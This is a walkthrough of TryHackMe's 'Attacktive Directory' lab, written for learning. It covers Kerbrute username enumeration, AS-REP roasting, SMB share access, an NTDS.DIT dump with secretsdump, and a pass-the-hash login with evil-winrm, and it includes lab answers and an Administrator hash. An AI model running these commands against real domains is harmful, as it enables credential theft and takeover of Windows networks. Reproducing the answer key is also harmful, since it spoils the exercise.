In this walk through, we will be going through the Attacktive Directory room from Tryhackme. In this room we will hacking a vulnerable domain controller in an Active Directory environment. If you are new to Active Directory, you better clear your basics by going through Tryhackme’s Active Directory Basics room. For now, i will assume you have already completed that room and we will march towards this. So, let’s get started.
|Objective||99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?|
Task 1 – [Intro] Deploy The Machine
Task 2 – [Intro] Setup
Use the following commands to setup the tools and environment for the room.
sudo apt install python3.9 git clone https://github.com/SecureAuthCorp/impacket.git sudo pip3 install -r /opt/impacket/requirements.txt sudo pip3 install . sudo python3 setup.py install
Task 3 – [Enumeration] Welcome to Attacktive Directory
Question 1 – What tool will allow us to enumerate port 139/445?
Question 2 – What is the NetBIOS-Domain Name of the machine?
Question 3 – What invalid TLD do people commonly use for their Active Directory Domain?
Task 4 – [Enumeration] Enumerating Users via Kerberos
Question 1 – What command within Kerbrute will allow us to enumerate valid usernames?
Question 2 – What notable account is discovered? (These should jump out at you)
Question 3 – What is the other notable account is discovered? (These should jump out at you)
Use the following command to extract the username using Kerbrute:
./kerbrute_linux_amd64 userenum --dc 10.10.14.173 -d spookysec.local ~/Desktop/username.txt
Task 5 – [Exploitation] Abusing Kerberos
Question 1 – We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Question 2 – Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23
Question 3 – What mode is the hash?
Question 4 – Now crack the hash with the modified password list provided, what is the user accounts password?
Task 6 – [Enumeration] Back to the Basics
Question 1 – What utility can we use to map remote SMB shares?
Question 2 – Which option will list shares?
Question 3 – How many remote shares is the server listing?
smbclient -L 10.10.14.173 -U svc-admin
Question 4 – There is one particular share that we have access to that contains a text file. Which share is it?
Question 5 – What is the content of the file?
Question 6 – Decoding the contents of the file, what is the full contents?
Task 7 – [Domain Privilege Escalation] Elevating Privileges within the Domain
Question 1 – What method allowed us to dump NTDS.DIT?
secretsdump.py -just-dc email@example.com
Question 2 – What is the Administrators NTLM hash?
Question 3 – What method of attack could allow us to authenticate as the user without the password?
Pass the Hash
Question 4 – Using a tool called Evil-WinRM what option will allow us to use a hash?
Task 8 – [Flag Submission] Flag Submission Panel
Question 1 – svc-admin
Question 2 – backup
Question 3 – Administrator
ruby evil-winrm.rb -i 10.10.14.173 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
So that was it. We started with enumerating the services running on port 139 and 445 using enum4linux. Post that, we brute forced Kerberos usernames using Kerbrute, getting potential usernames – svcadmin & backup. Moving on, we got the hashes and password of the accounts. Then, we connect with the user’s shares using smbclient, there we got a file containing strings in base 64. Decoding the string in Cyberchef, we got Domain and username with creds. Further, we used evil-winrm to access and move within the machines using Pass the Hash. Finally, getting a shell and dumping all the flags to complete the challenge. On that note, i bid goodbye for now and be back with another walk-through, till then “Hack the planet”.